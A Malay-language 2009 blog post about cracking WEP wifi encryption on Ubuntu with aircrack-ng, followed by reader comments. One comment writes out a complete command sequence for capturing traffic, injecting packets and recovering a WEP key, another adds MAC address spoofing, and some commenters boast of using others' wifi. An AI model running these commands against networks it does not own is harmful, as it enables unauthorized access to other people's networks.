Monday, March 30, 2009

Crack WEP dalam Ubuntu?

WEP(Wired Equivalent Privacy) ialah salah satu dari jenis Encryption bagi sesuatu Access Point jaringan tanpa wayar. Terdapat juga jenis encryption lain seperti WPA, WPA2 dan sebagainya. WEP biasanya dilindungi oleh kata laluan dan berita baiknya ialah, kita boleh connect kepada sesuatu access point yang dilindungi oleh WEP dalam ubuntu menggunakan aircrack-ng.

Anda boleh membaca lanjut tentang cara-cara untuk crack WEP dalam ubuntu menggunakan aircrack-ng dalam laman web rasmi aircrack-ng. Saya tidak boleh memasukkan tutorial langkah-demi-langkah disini kerana tidak cukup alatan. Jika anda cukup alatan dan telah mencubanya, apakata jika menyumbangkan artikel/tutorial anda disini?

13 comments:

  1. hehehehe.. aricrack.. satu benda yang merbahaya..

    use wisely

    p/s: kene taruk disclaim ni.. kalau apa2 berlaku tak de la nak menjawab

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete
  3. x adalah bahaya sgt. janji jgn lupa letak penafian/disclaimer. Wardriving is not a crime :)

    ReplyDelete
  4. SyaFia, tolong-menolong kan amalan mulia??haha!!

    ReplyDelete
  5. flame - haha.. gud one.. peraturan dalam negara kita apa ek pasal benda ni?

    ahmad - tolong menolong.. ada pada tempatnya.. :D

    ReplyDelete
  6. dh try aircrack-ng ni..
    memang betul2 kasi WEP terang2..
    tp mse mula2 dlu bening gak pakai..
    master adjust MAC number je da susah..
    jom try hack! ekeke..

    p/s:skrg aku da tk bleh buat psl wifi adapter tk support..huhu

    ReplyDelete
  7. use fakeAP to confuse the wardrivers and script kiddies..spoof ur AP mac address so that they cant detect which 1 is the real mac address..

    even so, there are techniques to identify the real mac address..

    ReplyDelete
  8. alo kwn..tlg tunjuk tutorial...

    ReplyDelete
  9. kepada saper yg ckup alatan,sumbangkanlah artikel/tutorial anda di sini

    ReplyDelete
  10. airmon-ng start wlan0

    airodump-ng wlan0

    airodump-ng -w apa-apa saja -c chanel wifi --bssid contoh mcm ini 00:11:22:33:44:55 wlan0

    aireplay-ng -1 0 -a 00:11:22:33:44:55 wlan0

    aireplay-ng -3 -b 00:11:22:33:44:55 wlan0

    tunggu sampai Data >30000

    dan dir

    aircrack-ng apa-apa saja-01.cap

    lepas tu kalau nasib baik boleh nampak KEY FOUND: 12:34:56:78:90 ini CONTOH

    Buang titik tu=1234567890 ini lah network key

    cara ini untuk pengetahuan anda sahaja..Jangan mencuri wifi orang..tak baik tu.

    http;//nwocomputerlinux.blogspot.com

    ReplyDelete
  11. airmon-ng stop wlan0

    macchanger --mac 00:11:22:33:44:55 wlan0

    pas tu

    airmon-ng start wlan0

    simple saja

    ReplyDelete
  12. aku dah biasa gne cara nie...mmg syok gila...stakat nie mne2 aku duduk x penah gne berukband or lain2..just crack...hehehehehe...lagi la klu pakai WIRELESS USB ADAPTER mmg kuat gila tarik wifi...pastu gne backtrack4 + spoonwep..Pergh!!! senang siot!!...tp yg penting tmpt korang tu confirm la kne ada line wifi..klu duk kt kampung2 tu..xpasti la ada line ke x...

    ReplyDelete

Terima kasih atas respon..

Quartz OS: Material Design + Linux = Awesome

Konsep Material Design pertama kali diperkenalkan oleh Google untuk Android 5.0 Lollipop. Nampaknya, ada developer yang berminat untuk ...